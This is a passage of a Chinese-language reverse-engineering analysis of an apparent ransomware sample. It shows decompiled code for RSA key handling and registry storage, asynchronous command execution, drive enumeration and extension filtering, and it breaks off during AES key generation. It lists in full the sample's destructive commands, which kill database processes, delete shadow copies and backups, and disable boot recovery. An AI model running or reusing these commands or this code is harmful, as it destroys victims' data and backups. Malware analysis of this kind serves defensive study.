0x83, 0xB4, 0x68, 0x27, 0x4C, 0x50, 0x56, 0xD2, 0xD0, 0xD1,
0xC1, 0x01, 0xB0, 0xD3, 0xF0, 0x00, 0x16, 0x57, 0xEE, 0x1B,
0x83, 0x2B, 0xEF, 0xBB, 0x2F, 0x74, 0x4E, 0xDC, 0xB4, 0x35,
0x2E, 0xBD, 0xBF, 0xA8, 0x34, 0x47, 0x5E, 0xE0, 0x43, 0x71,
0x62, 0x36, 0xEC, 0x76, 0x65, 0xFC, 0x59, 0x2F, 0x30, 0x83,
0x01, 0x21, 0x03, 0x16, 0x16, 0xA6, 0x9C, 0x09, 0x80, 0x4B,
0x9F, 0xA1, 0xB2, 0xC9, 0xC1, 0x7C, 0x39, 0xDD, 0x42, 0xB3,
0xCB, 0x72, 0x36, 0xD3, 0x30, 0xD3, 0x81, 0x5D, 0x46, 0x02,
0x1C, 0x8B, 0x8E, 0xE8, 0x12, 0x3E, 0xA9, 0x75, 0xD1, 0xCD,
0xAC, 0xE8, 0x85, 0x39, 0x40, 0x63, 0x55, 0x60, 0x23, 0xE0,
0x2F, 0x38, 0x8B, 0x7B, 0x2A, 0x48, 0x7C, 0x4D, 0xEE, 0x7F,
0xC0, 0x90, 0xB2, 0xDF, 0xD5, 0x7D, 0x71, 0x72, 0x3A, 0x5E,
0x3C, 0x4B, 0x67, 0x61, 0xCB, 0x9B, 0x37, 0xA1, 0xBC, 0x60,
0x45, 0x62, 0x70, 0xA2, 0x46, 0x1A, 0x86, 0xF3, 0xCA, 0xA4,
0x53, 0x9A, 0xA1, 0xD0, 0x73, 0xF8, 0x86, 0xF6, 0xDE, 0xD8,
0xFD, 0xB2, 0x92, 0x85, 0x0F, 0x66, 0x80, 0x29, 0xE5, 0x7E,
0xEA, 0xC9, 0x99, 0xB4, 0xD5, 0x9E, 0xC8, 0x14, 0x2F, 0x34,
0xF6, 0x36, 0xDF, 0xF0, 0x6A, 0x35, 0x6F, 0xFB, 0xE3, 0x31,
0x3E, 0x3D, 0x68, 0x97, 0x1F, 0x78, 0x34, 0xB7, 0x7A, 0xD2,
0x6D, 0xA0, 0x00, 0x4D, 0x4A, 0x9D, 0x1F, 0xEE, 0x29, 0x34,
0xC9, 0x07, 0x11, 0xA0, 0x5C, 0x04, 0x87, 0x16, 0xC3, 0x52,
0x36, 0x80, 0x9D, 0xCA, 0xA6, 0x0F, 0xE5, 0x2A, 0xCA, 0x7A,
0x95, 0x86, 0x99, 0x11, 0x4C, 0xF5, 0x32, 0xAD, 0x52, 0x70,
0x88, 0xAE, 0xAB, 0x57, 0x81, 0xE6, 0x94, 0x3F, 0x84, 0x8C,
0x8F, 0x35, 0x6F, 0x89, 0x62, 0x70, 0x14, 0xD4, 0x9E, 0x75,
0x39, 0x21, 0x58, 0xAB, 0xB4, 0x34, 0xD7, 0x9D, 0xC0, 0x2E,
0x12, 0xB3, 0x99, 0x84, 0x75, 0x7E, 0xC0, 0xDF, 0xE8, 0x10,
0xB7, 0xB1, 0x10, 0x44, 0xCD, 0xC4, 0x9C, 0x42, 0x02, 0xE3,
0x90, 0x7C, 0x50, 0x5F, 0x3D, 0x76, 0xF9, 0x20, 0x5E, 0x58,
0x8D, 0xE5, 0x85, 0x85, 0xF3, 0x53, 0x06, 0xB6, 0x27, 0xBA,
0xA3, 0x5B, 0x2A, 0x56, 0xBF, 0xFC, 0x4B, 0xF0, 0xBA, 0xA1,
0x5E, 0xD8, 0xE5, 0x2B, 0xF2, 0xED, 0x28, 0x35, 0x30, 0x57,
0x4C, 0x3D, 0xF8, 0xE2, 0x48, 0xE4, 0x6D, 0x5A, 0xE5, 0x30,
0xB1, 0xC8, 0xDF, 0x4F, 0x74, 0x36, 0x50, 0xA0, 0xEC, 0x72,
0xAC, 0xD5, 0x76, 0x6E, 0x8F, 0x1F, 0x8F, 0x8B, 0xD3, 0xF3,
0x78, 0x0B, 0xD1, 0x1E, 0x96, 0x1C, 0x57, 0x5F, 0x02, 0xB6,
0xEF, 0xEC, 0x46, 0x13, 0xBD, 0xC9, 0x9F, 0x0B, 0xDC, 0xFF,
0x8E, 0xBC, 0x7F, 0xEE, 0xD7, 0xFC, 0x13, 0xC4, 0xD9, 0xA0,
0x30, 0x8C, 0xBC, 0x15, 0xEA, 0x2D, 0x35, 0xCB, 0xC3, 0x1A,
0xCB, 0x70, 0x2F, 0x17, 0xCD, 0x01, 0xEC, 0xFC, 0x0B, 0xBF,
0x3B, 0xC4, 0xEC, 0x92, 0x50, 0x8A, 0x33, 0xCC, 0x07, 0x0F,
0xF0, 0xF8, 0xD6, 0x0D, 0x54, 0x7B, 0x2A, 0x26, 0xA6, 0x7F,
0x2B, 0xD4, 0xF5, 0x71, 0x3B, 0x10, 0x8A, 0x89, 0x58, 0xEC,
0x92, 0x15, 0x31, 0xAC, 0x13, 0x44, 0x0D, 0xCC, 0xED, 0x7B,
0x5B, 0xB8, 0x6C, 0xEF, 0xA8, 0x91, 0xF0, 0x17, 0xF5, 0x9B,
0x26, 0xB4, 0x21, 0x5E, 0xCB, 0x6A, 0x56, 0xD0, 0x65, 0x85,
0xEE, 0x67, 0x62, 0x5C, 0xCC, 0xE0, 0x31, 0xA1, 0xC6, 0xB7,
0x28, 0xE4, 0xE5, 0xFE, 0x59, 0x42, 0x0B, 0x69, 0x59, 0x10,
0x0B, 0x1B, 0x8A, 0xC2, 0x2F, 0x02, 0x24, 0x3F, 0xFA, 0x72,
0xC9, 0xD8, 0x05, 0xDD, 0x49, 0x2B, 0x2B, 0xB2, 0x2B, 0xD2,
0x1C, 0x7A, 0x9C, 0xCB, 0x33, 0xDC, 0x99, 0x98, 0x0E, 0xA2,
0xFB, 0x52, 0x4C, 0xC0, 0x32, 0x55, 0x11, 0xDE, 0xCD, 0xC3,
0x63, 0x80, 0x62, 0x48, 0x72, 0xEA, 0xEE, 0x56, 0x19, 0xE3
再把刚刚的公钥进行base64编码
BOOL __fastcall sub_7FF6BE634960(__int64 a1, __int64 *a2)
{
_DWORD *v2; // rsi
DWORD v4; // edx
const BYTE *v6; // rcx
BOOL result; // eax
unsigned __int64 v8; // r9
__int64 v9; // rdx
__int64 *v10; // rdi
__int64 *v11; // rax
unsigned __int64 v12; // r10
unsigned __int64 v13; // rcx
__int64 *v14; // r8
_WORD *v15; // rdi
WCHAR *v16; // r9
BOOL v17; // esi
__int64 v18; // rcx
__int64 v19; // r8
unsigned __int64 v20; // r9
unsigned __int64 v21; // rdx
_WORD *v22; // rdi
__int64 i; // rcx
DWORD pcchString; // [rsp+50h] [rbp+8h] BYREF
v2 = (_DWORD *)(a1 + 8);
v4 = *(_DWORD *)(a1 + 8) - *(_DWORD *)a1;
v6 = *(const BYTE **)a1;
pcchString = 0;
result = CryptBinaryToStringW(v6, v4, 0x40000001u, 0LL, &pcchString);
if ( result )
{
v8 = a2[2];
v9 = pcchString;
v10 = a2 + 2;
if ( pcchString > v8 )
{
v12 = a2[3];
v13 = pcchString - v8;
if ( v13 > v12 - v8 )
{
sub_7FF6BE627CB0(a2);
}
else
{
*v10 = pcchString;
v14 = a2;
if ( v12 > 7 )
v14 = (__int64 *)*a2;
v15 = (_WORD *)v14 + v8;
if ( v13 )
{
while ( v13 )
{
*v15++ = 0;
--v13;
}
}
*((_WORD *)v14 + v9) = 0;
v2 = (_DWORD *)(a1 + 8);
v10 = a2 + 2;
}
}
else
{
*v10 = pcchString;
v11 = a2;
if ( (unsigned __int64)a2[3] > 7 )
{
v11 = (__int64 *)*a2;
v2 = (_DWORD *)(a1 + 8);
v10 = a2 + 2;
}
*((_WORD *)v11 + v9) = 0;
}
v16 = (WCHAR *)a2;
if ( (unsigned __int64)a2[3] > 7 )
v16 = (WCHAR *)*a2;
result = CryptBinaryToStringW(*(const BYTE **)a1, *v2 - *(_DWORD *)a1, 0x40000001u, v16, &pcchString);
v17 = result;
if ( result )
{
v18 = pcchString;
v19 = *v10;
if ( pcchString > (unsigned __int64)*v10 )
{
v20 = a2[3];
v21 = pcchString - v19;
if ( v21 > v20 - v19 )
{
sub_7FF6BE627CB0(a2);
}
else
{
*v10 = pcchString;
if ( v20 > 7 )
a2 = (__int64 *)*a2;
v22 = (_WORD *)a2 + v19;
if ( v21 )
{
for ( i = v18 - v19; i; --i )
*v22++ = 0;
}
*((_WORD *)a2 + v19 + v21) = 0;
}
}
else
{
*v10 = pcchString;
if ( (unsigned __int64)a2[3] > 7 )
a2 = (__int64 *)*a2;
*((_WORD *)a2 + v18) = 0;
}
return v17;
}
}
return result;
}
结果如下
BgIAAACkAABSU0ExAAgAAAEAAQAloLeREQgNzjKVqEEAxkLFUHfpkAogoS7fp09PnSbs7toNPIFTmXfzpbOe2qWpnlnkuYydZ9MsRXRWoFOkKEHEjd0HUrh+kfEq5NvY+wSQi0JwrsSoIQOSzV6gN86Dsijc+Q4/J30gDjiSfsyX1DCmehBAh87weFFGFt2TcczSjcUImagbS2kB2cLv3GH5/835wKx2L80w1GfZk20vxpIR/8SYMKY/VMA+De9wR74AQioDEX2sqOZniJAQ5KAThBA+Zph8JFMk837SS+bXEh3RAYvBKaPewvfMVi2OHqznS+7Gt5caWwGV+XYnXOndYYFVWvYtAF+0WRXyZe4jtZei
然后将刚刚加密后的加密数据也用base64编码
  q8UsO7A0U2HLO8U5WOqgFBdKjCVEjVeo37mIrWR8XdA7XELLzITq8YtOclCvQLFgz2whpb3FuemsLhCpPEY5q4DEn01JJp6AyW7BqI38OQXMijfxjg4GbHkTMHruFp1RaroiYVl7xXy5t3Rlqb/lf5yX/5NDRII3/We2RGwecVxVEuWotVPQd+YnPBDNhnrzUFUCeaqqv6HoesnHGyX/yWEwlEUhyXGr4+U+9SWaSiJiApr4W8uvR5+FTHEXhMEIoWvSYZLwcLLO5xzhkNcq3MLlev9rCwgLEiEzYNwLFbCeeIgIxGNdOf29kgSFhsFjIPFCbBqiu1q7DTzRH65pNwRhHT2B1VY/jDO5SO7CCgtQ62spMt8ZJy57kGRYR7pYZE8BeSC+yYgdkmotPRo9CD8gn0+aNkxL7TfZAZvMSJ7+AqlYObdtHrRqq1RRYXWC8oKbzmrvmWTUHQF8MWVS1/sbh/N2syGxkVGh8odKmvw+/ayRZggXlhgSgk6KOGyewnzSbE/6XyrJAWfikVV7UJN02hv/L6QxBqakbzlb3zar7D1NuMQXjYUhapwzwg8ws5RVtiB/oVoP8wsaO/Hhylo5Sw4ttmuDsa97aiFzKFmuZVTAapGAMdHzVD8ldRtrHh8H+5nsuijzcu94LZ2mpHc8TOUslvRsmFV3DRdQYRbUZ12nr3rfXvXVYSNrhimDVvaopvxGDZM4MnoRFtwViaKpoeB7q97vUjXKHB/Nc3jR9EOhEtrpfI2Ru27pOlgFeoShlwy7f0suQasD/nVhbdfwHmMmKG9P3Q8Zrd7++NyT1oMhEO3GIbpP/AZVaZNJ3IvBmwHf9vsQPtfqNavCWckwK9jFqmnOLQ0Lr73QzO/r3TBT9RpHqKonIuOJK66Lx5kdeBCl/woQylLrvnPPiU9ubpjxfxAShCd7nj0OA+viCQGyWIMYd4mp6TzZYVWmv8arENaSmyUfAKEP3mLmIFbH1clHIz4Py4NmsjB1g7RoJ0xQVtLQ0cEBsNPwABZX7huDK++7L3RO3LQ1Lr2/qDRHXuBDcWI27HZl/FkvMIMBIQMWFqacCYBLn6GyycF8Od1Cs8tyNtMw04FdRgIci47oEj6pddHNrOiFOUBjVWAj4C84i3sqSHxN7n/AkLLf1X1xcjpePEtnYcubN6G8YEVicKJGGobzyqRTmqHQc/iG9t7Y/bKShQ9mgCnlfurJmbTVnsgULzT2Nt/wajVv++MxPj1olx94NLd60m2gAE1KnR/uKTTJBxGgXASHFsNSNoCdyqYP5SrKepWGmRFM9TKtUnCIrqtXgeaUP4SMjzVviWJwFNSedTkhWKu0NNedwC4Ss5mEdX7A3+gQt7EQRM3EnEIC45B8UF89dvkgXliN5YWF81MGtie6o1sqVr/8S/C6oV7Y5Svy7Sg1MFdMPfjiSORtWuUwscjfT3Q2UKDscqzVdm6PH4+L0/N4C9EelhxXXwK27+xGE73Jnwvc/468f+7X/BPE2aAwjLwV6i01y8May3AvF80B7PwLvzvE7JJQijPMBw/w+NYNVHsqJqZ/K9T1cTsQiolY7JIVMawTRA3M7XtbuGzvqJHwF/WbJrQhXstqVtBlhe5nYlzM4DGhxrco5OX+WUILaVkQCxuKwi8CJD/6csnYBd1JKyuyK9IcepzLM9yZmA6i+1JMwDJVEd7Nw2OAYkhy6u5WGeM=
将自带的RSA公钥和后生成并且加密后的RSA私钥写入到注册表SOFTWARE\\PAIDMEMES的PUBLIC和PRIVATE的键值中
// Hidden C++ exception states: #wind=4
__int64 __fastcall sub_7FF6BE6232C0(BYTE *lpData, BYTE *a2, __int64 a3, __int64 a4)
{
const WCHAR *v6; // rdx
unsigned int v7; // eax
__int64 v8; // r9
HKEY v9; // rbx
WCHAR *v10; // rcx
char v11; // di
DWORD v12; // eax
const WCHAR *v13; // rdx
__int64 v14; // r9
DWORD v15; // eax
const WCHAR *v16; // rdx
char v17; // si
WCHAR *v18; // rcx
WCHAR *v19; // rcx
unsigned __int8 v20; // di
LPCWSTR lpSubKey[2]; // [rsp+50h] [rbp-39h] BYREF
__m128i si128; // [rsp+60h] [rbp-29h]
LPCWSTR v24[2]; // [rsp+70h] [rbp-19h] BYREF
__m128i v25; // [rsp+80h] [rbp-9h]
LPCWSTR lpValueName[2]; // [rsp+90h] [rbp+7h] BYREF
__int128 v27; // [rsp+A0h] [rbp+17h]
HKEY hKey; // [rsp+100h] [rbp+77h] BYREF
HKEY v29; // [rsp+108h] [rbp+7Fh]
LODWORD(hKey) = 0;
*(_OWORD *)lpSubKey = 0LL;
si128 = 0LL;
copy_str(lpSubKey, L"SOFTWARE\\PAIDMEMES", 0x12uLL, a4);
hKey = 0LL;
v6 = (const WCHAR *)lpSubKey;
if ( si128.m128i_i64[1] > 7uLL )
v6 = lpSubKey[0];
v7 = RegCreateKeyExW(HKEY_CURRENT_USER, v6, 0, 0LL, 0, 0x2011Fu, 0LL, &hKey, 0LL);
if ( v7 )
{
error_printf(lpValueName, v7, "RegCreateKeyExW failed.");
throw (winreg::RegException *)lpValueName;
}
v9 = hKey;
v29 = hKey;
if ( si128.m128i_i64[1] > 7uLL )
{
v10 = (WCHAR *)lpSubKey[0];
if ( (unsigned __int64)(2 * si128.m128i_i64[1] + 2) >= 0x1000 )
{
v10 = (WCHAR *)*((_QWORD *)lpSubKey[0] - 1);
if ( (unsigned __int64)((char *)lpSubKey[0] - (char *)v10 - 8) > 0x1F )
invalid_parameter_noinfo_noreturn();
}
j_j_free(v10);
}
si128 = _mm_load_si128((const __m128i *)&xmmword_7FF6BE6790D0);
LOWORD(lpSubKey[0]) = 0;
if ( !v9 )
goto LABEL_34;
*(_OWORD *)lpValueName = 0LL;
v27 = 0LL;
copy_str(lpValueName, L"PUBLIC", 6uLL, v8);
v11 = 1;
LODWORD(hKey) = 1;
v12 = 2 * *((_DWORD *)lpData + 4) + 2;
if ( *((_QWORD *)lpData + 3) > 7uLL )
lpData = *(BYTE **)lpData;
v13 = (const WCHAR *)lpValueName;
if ( *((_QWORD *)&v27 + 1) > 7uLL )
v13 = lpValueName[0];
if ( RegSetValueExW(v9, v13, 0, 1u, lpData, v12) )
goto LABEL_20;
*(_OWORD *)v24 = 0LL;
v25 = 0LL;
copy_str(v24, L"PRIVATE", 7uLL, v14);
v11 = 3;
v15 = 2 * *((_DWORD *)a2 + 4) + 2;
if ( *((_QWORD *)a2 + 3) > 7uLL )
a2 = *(BYTE **)a2;
v16 = (const WCHAR *)v24;
if ( v25.m128i_i64[1] > 7uLL )
v16 = v24[0];
if ( RegSetValueExW(v9, v16, 0, 1u, a2, v15) )
LABEL_20:
v17 = 0;
else
v17 = 1;
if ( (v11 & 2) != 0 )
{
v11 &= ~2u;
if ( v25.m128i_i64[1] > 7uLL )
{
v18 = (WCHAR *)v24[0];
if ( (unsigned __int64)(2 * v25.m128i_i64[1] + 2) >= 0x1000 )
{
v18 = (WCHAR *)*((_QWORD *)v24[0] - 1);
if ( (unsigned __int64)((char *)v24[0] - (char *)v18 - 8) > 0x1F )
invalid_parameter_noinfo_noreturn();
}
j_j_free(v18);
}
v25 = _mm_load_si128((const __m128i *)&xmmword_7FF6BE6790D0);
LOWORD(v24[0]) = 0;
}
if ( (v11 & 1) != 0 && *((_QWORD *)&v27 + 1) > 7uLL )
{
v19 = (WCHAR *)lpValueName[0];
if ( (unsigned __int64)(2LL * *((_QWORD *)&v27 + 1) + 2) >= 0x1000 )
{
v19 = (WCHAR *)*((_QWORD *)lpValueName[0] - 1);
if ( (unsigned __int64)((char *)lpValueName[0] - (char *)v19 - 8) > 0x1F )
invalid_parameter_noinfo_noreturn();
}
j_j_free(v19);
}
if ( v17 )
v20 = 1;
else
LABEL_34:
v20 = 0;
if ( v9
&& (unsigned __int64)(v9 + 0x20000000) > 5
&& v9 != HKEY_CURRENT_USER_LOCAL_SETTINGS
&& v9 != HKEY_PERFORMANCE_NLSTEXT
&& v9 != HKEY_PERFORMANCE_TEXT )
{
RegCloseKey(v9);
}
return v20;
}
4.1.4 强制终止 SQL Server 相关进程和服务,并清除备份和恢复点
创建管道异步执行命令,并获取返回
// Hidden C++ exception states: #wind=2
__int64 __fastcall sub_7FF6BE642E00(__int64 a1, __int64 a2)
{
_QWORD *v4; // rbx
_QWORD *v5; // rdi
WCHAR *v6; // rdx
__m128i v7; // xmm1
void *v8; // rcx
__int64 result; // rax
DWORD v10; // ebx
DWORD v11; // r8d
__int64 v12; // r8
void *v13; // rcx
unsigned __int64 v14; // rdx
_QWORD *v15; // rcx
HANDLE hReadPipe; // [rsp+50h] [rbp-B0h] BYREF
HANDLE hWritePipe; // [rsp+58h] [rbp-A8h] BYREF
struct _PROCESS_INFORMATION ProcessInformation; // [rsp+60h] [rbp-A0h] BYREF
__int128 Src; // [rsp+78h] [rbp-88h] BYREF
__m128i si128; // [rsp+88h] [rbp-78h]
struct _SECURITY_ATTRIBUTES PipeAttributes; // [rsp+A0h] [rbp-60h] BYREF
struct _STARTUPINFOW StartupInfo; // [rsp+C0h] [rbp-40h] BYREF
__int128 v23; // [rsp+130h] [rbp+30h]
_BYTE Buffer[1056]; // [rsp+150h] [rbp+50h] BYREF
DWORD TotalBytesAvail; // [rsp+590h] [rbp+490h] BYREF
DWORD NumberOfBytesRead; // [rsp+598h] [rbp+498h] BYREF
v4 = (_QWORD *)(a2 + 24);
v5 = (_QWORD *)(a2 + 24);
printf_0((char *)L"[-] Run async command: %s\n");
PipeAttributes.nLength = 24;
*(&PipeAttributes.bInheritHandle + 1) = 0;
PipeAttributes.bInheritHandle = 1;
PipeAttributes.lpSecurityDescriptor = 0LL;
if ( CreatePipe(&hReadPipe, &hWritePipe, &PipeAttributes, 0) )
{
StartupInfo.cb = 104;
memset(&StartupInfo.lpReserved, 0, 80);
StartupInfo.dwFlags = 257;
StartupInfo.hStdOutput = hWritePipe;
StartupInfo.hStdError = hWritePipe;
StartupInfo.wShowWindow = 0;
memset(&ProcessInformation, 0, sizeof(ProcessInformation));
v6 = (WCHAR *)a2;
if ( *v4 > 7uLL )
v6 = *(WCHAR **)a2;
if ( CreateProcessW(0LL, v6, 0LL, 0LL, 1, 0x10u, 0LL, 0LL, &StartupInfo, &ProcessInformation) )
{
if ( hJob )
AssignProcessToJobObject(hJob, ProcessInformation.hProcess);
Src = 0LL;
si128 = _mm_load_si128((const __m128i *)&xmmword_7FF6BE6790E0);
LOBYTE(Src) = 0;
do
{
v10 = WaitForSingleObject(ProcessInformation.hProcess, 1u);
NumberOfBytesRead = 0;
for ( TotalBytesAvail = 0; PeekNamedPipe(hReadPipe, 0LL, 0, 0LL, &TotalBytesAvail, 0LL); TotalBytesAvail = 0 )
{
if ( !TotalBytesAvail )
break;
v11 = 1023;
if ( TotalBytesAvail <= 0x3FF )
v11 = TotalBytesAvail;
if ( !ReadFile(hReadPipe, Buffer, v11, &NumberOfBytesRead, 0LL) )
break;
if ( !NumberOfBytesRead )
break;
Buffer[NumberOfBytesRead] = 0;
v12 = -1LL;
do
++v12;
while ( Buffer[v12] );
sub_7FF6BE626D70(&Src);
NumberOfBytesRead = 0;
}
}
while ( v10 );
CloseHandle(hWritePipe);
CloseHandle(hReadPipe);
CloseHandle(ProcessInformation.hProcess);
CloseHandle(ProcessInformation.hThread);
*(_BYTE *)a1 = 1;
sub_7FF6BE626680(a1 + 8, &Src);
if ( si128.m128i_i64[1] > 0xFuLL )
{
v13 = (void *)Src;
if ( (unsigned __int64)(si128.m128i_i64[1] + 1) >= 0x1000 )
{
v13 = *(void **)(Src - 8);
if ( (unsigned __int64)(Src - (_QWORD)v13 - 8) > 0x1F )
invalid_parameter_noinfo_noreturn();
}
j_j_free(v13);
}
si128 = _mm_load_si128((const __m128i *)&xmmword_7FF6BE6790E0);
LOBYTE(Src) = 0;
v14 = *(_QWORD *)(a2 + 24);
if ( v14 > 7 )
{
v15 = *(_QWORD **)a2;
if ( 2 * v14 + 2 >= 0x1000 )
{
if ( (unsigned __int64)v15 - *(v15 - 1) - 8 > 0x1F )
goto LABEL_37;
v15 = (_QWORD *)*(v15 - 1);
}
j_j_free(v15);
}
*(_QWORD *)(a2 + 24) = 7LL;
goto LABEL_12;
}
CloseHandle(hWritePipe);
CloseHandle(hReadPipe);
v4 = v5;
}
GetLastError();
printf_0((char *)L"[!] Failed to run async command: %s, error 0x%X\n");
v23 = 0LL;
v7 = _mm_load_si128((const __m128i *)&xmmword_7FF6BE6790E0);
LOBYTE(v23) = 0;
*(_BYTE *)a1 = 0;
*(_OWORD *)(a1 + 8) = v23;
*(__m128i *)(a1 + 24) = v7;
if ( *v4 > 7uLL )
{
v8 = *(void **)a2;
if ( (unsigned __int64)(2LL * *v4 + 2) < 0x1000 )
{
LABEL_10:
j_j_free(v8);
goto LABEL_11;
}
if ( (unsigned __int64)v8 - *((_QWORD *)v8 - 1) - 8 <= 0x1F )
{
v8 = (void *)*((_QWORD *)v8 - 1);
v4 = (_QWORD *)(a2 + 24);
goto LABEL_10;
}
LABEL_37:
invalid_parameter_noinfo_noreturn();
}
LABEL_11:
*v4 = 7LL;
LABEL_12:
result = a1;
*(_WORD *)a2 = 0;
*(_QWORD *)(a2 + 16) = 0LL;
return result;
}
执行如下几个命令
"rem Kill \"SQL\"",
"taskkill -f -im sqlbrowser.exe",
"taskkill -f -im sql writer.exe",
"taskkill -f -im sqlserv.exe",
"taskkill -f -im msmdsrv.exe",
"taskkill -f -im MsDtsSrvr.exe",
"taskkill -f -im sqlceip.exe",
"taskkill -f -im fdlauncher.exe",
"taskkill -f -im Ssms.exe",
"taskkill -f -im SQLAGENT.EXE",
"taskkill -f -im fdhost.exe",
"taskkill -f -im ReportingServicesService.exe",
"taskkill -f -im msftesql.exe",
"taskkill -f -im pg_ctl.exe",
"taskkill -f -impostgres.exe",
"net stop MSSQLServerADHelper100",
"net stop MSSQL$ISARS",
"net stop MSSQL$MSFW",
"net stop SQLAgent$ISARS",
"net stop SQLAgent$MSFW",
"net stop SQLBrowser",
"net stop REportServer$ISARS",
"net stop SQLWriter",
"vssadmin.exe Delete Shadows /All /Quiet",
"wbadmin delete backup -keepVersion:0 -quiet",
"wbadmin DELETE SYSTEMSTABACKUP -deleteOldest",
"wmic.exe SHADOWCOPY /nointeractive",
"bcdedit.exe /set {default} recoverynabled No",
"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"
4.1.5 遍历文件
枚举卷
// Hidden C++ exception states: #wind=1
int sub_7FF6BE635EF0()
{
HANDLE FirstVolumeW; // rax
void *v1; // rdi
__int64 v2; // rcx
__int64 i; // rcx
WCHAR *v4; // rbx
DWORD DosDeviceW; // eax
__int64 v6; // rcx
WCHAR szVolumeName[4]; // [rsp+20h] [rbp-428h] BYREF
WCHAR DeviceName[260]; // [rsp+28h] [rbp-420h] BYREF
WCHAR TargetPath[268]; // [rsp+230h] [rbp-218h] BYREF
FirstVolumeW = FindFirstVolumeW(szVolumeName, 0x104u);
v1 = FirstVolumeW;
if ( FirstVolumeW != (HANDLE)-1LL )
{
v2 = -1LL;
do
++v2;
while ( szVolumeName[v2] );
for ( i = v2 - 1; szVolumeName[0] == '\\'; i = v6 - 1 )
{
if ( szVolumeName[1] != '\\' )
break;
if ( szVolumeName[2] != '?' )
break;
if ( szVolumeName[3] != '\\' )
break;
v4 = &szVolumeName[i];
if ( *v4 != '\\' )
break;
*v4 = 0;
DosDeviceW = QueryDosDeviceW(DeviceName, TargetPath, 0x104u);
*v4 = 92;
if ( !DosDeviceW )
break;
sub_7FF6BE635CE0(szVolumeName);
if ( !FindNextVolumeW(v1, szVolumeName, 0x104u) )
break;
v6 = -1LL;
do
++v6;
while ( szVolumeName[v6] );
}
LODWORD(FirstVolumeW) = FindVolumeClose(v1);
}
return (int)FirstVolumeW;
}
判断当前进程是否以管理员权限运行
TokenHandle = 0LL;
CurrentProcess = GetCurrentProcess();
if ( OpenProcessToken(CurrentProcess, 8u, &TokenHandle) )
{
ReturnLength = 4;
if ( GetTokenInformation(TokenHandle, TokenElevation, &TokenInformation, 4u, &ReturnLength) )
v55 = TokenInformation;
}
if ( TokenHandle )
CloseHandle(TokenHandle);
遍历网络驱动器
*a1 = 0LL;
a1[1] = 0LL;
a1[2] = 0LL;
v18 = 1;
LogicalDrives = GetLogicalDrives();
for ( i = 0; i < 0x1A; ++i )
{
if ( _bittest((const int *)&LogicalDrives, i) )
{
*(_OWORD *)lpRootPathName = 0LL;
v16 = 0LL;
v17 = 0LL;
copy_str(lpRootPathName, L"A:", 2uLL, v3);
v5 = lpRootPathName;
if ( v17 > 7 )
v5 = (LPCWSTR *)lpRootPathName[0];
*(_WORD *)v5 += i;
v6 = (const WCHAR *)lpRootPathName;
if ( v17 > 7 )
v6 = lpRootPathName[0];
if ( GetDriveTypeW(v6) == 4 )
{
nLength = 1028;
v7 = (const WCHAR *)lpRootPathName;
if ( v17 > 7 )
v7 = lpRootPathName[0];
if ( WNetGetConnectionW(v7, RemoteName, &nLength) )
{
printf_0((char *)L"[!] WNetGetConnection failed 0x%X\n");
}
遍历目录,并过滤下面几个目录
遍历文件,判断文件是否为勒索信
判断文件是否大于0x1000
过滤后缀
过滤的后缀如下
2E 00 65 00 78 00 65 00 00 00 00 00 00 00 00 00 ..e.x.e.........
04 00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 ................
2E 00 64 00 6C 00 6C 00 00 00 00 00 00 00 00 00 ..d.l.l.........
04 00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 ................
2E 00 73 00 79 00 73 00 00 00 00 00 00 00 00 00 ..s.y.s.........
04 00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 ................
2E 00 69 00 6E 00 69 00 00 00 00 00 00 00 00 00 ..i.n.i.........
04 00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 ................
2E 00 72 00 64 00 70 00 00 00 00 00 00 00 00 00 ..r.d.p.........
04 00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 ................
2E 00 6C 00 6E 00 6B 00 00 00 00 00 00 00 00 00 ..l.n.k.........
04 00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 ................
2E 00 62 00 6D 00 70 00 00 00 00 00 00 00 00 00 ..b.m.p.........
04 00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 ................
2E 00 6D 00 6F 00 76 00 00 00 00 00 00 00 00 00 ..m.o.v.........
04 00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 ................
2E 00 63 00 61 00 62 00 00 00 00 00 00 00 00 00 ..c.a.b.........
04 00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 ................
2E 00 75 00 72 00 6C 00 00 00 00 00 00 00 00 00 ..u.r.l.........
04 00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 ................
2E 00 76 00 73 00 69 00 78 00 00 00 00 00 00 00 ..v.s.i.x.......
05 00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 ................
2E 00 6D 00 73 00 69 00 00 00 00 00 00 00 00 00 ..m.s.i.........
04 00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 ................
2E 00 70 00 79 00 63 00 00 00 00 00 00 00 00 00 ..p.y.c.........
04 00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 ................
2E 00 70 00 79 00 64 00 00 00 00 00 00 00 00 00 ..p.y.d.........
04 00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 ................
2E 00 76 00 64 00 6D 00 00 00 00 00 00 00 00 00 ..v.d.m.........
04 00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 ................
2E 00 6A 00 73 00 6F 00 6E 00 00 00 00 00 00 00 ..j.s.o.n.......
4.1.6 aes-key生成
生成aes的key
用一开始生成的公钥将刚刚生成的key用rsa加密
__int64 __fastcall enc_ran_key(__int64 a1, __int64 *a2)
{
__int64 v4; // r14
DWORD v5; // r13d
unsigned int KeyParam; // edi
bool v7; // zf
DWORD v8; // eax
__int64 v9; // rdi
char *v10; // rbx
char *v11; // rsi
__int64 v12; // r12
__int64 v13; // r9
__int64 v14; // r8
__int64 v15; // r13
size_t v16; // rdi
void *v17; // rcx
char *v18; // rax
DWORD v20; // [rsp+40h] [rbp-29h] BYREF
DWORD v21; // [rsp+44h] [rbp-25h]
HCRYPTKEY hKey; // [rsp+48h] [rbp-21h] BYREF
BOOL Final; // [rsp+50h] [rbp-19h]
HCRYPTPROV phProv; // [rsp+58h] [rbp-11h] BYREF
void *v25; // [rsp+60h] [rbp-9h] BYREF
char *v26; // [rsp+68h] [rbp-1h]
__int64 v27; // [rsp+70h] [rbp+7h]
__int128 v28; // [rsp+78h] [rbp+Fh] BYREF
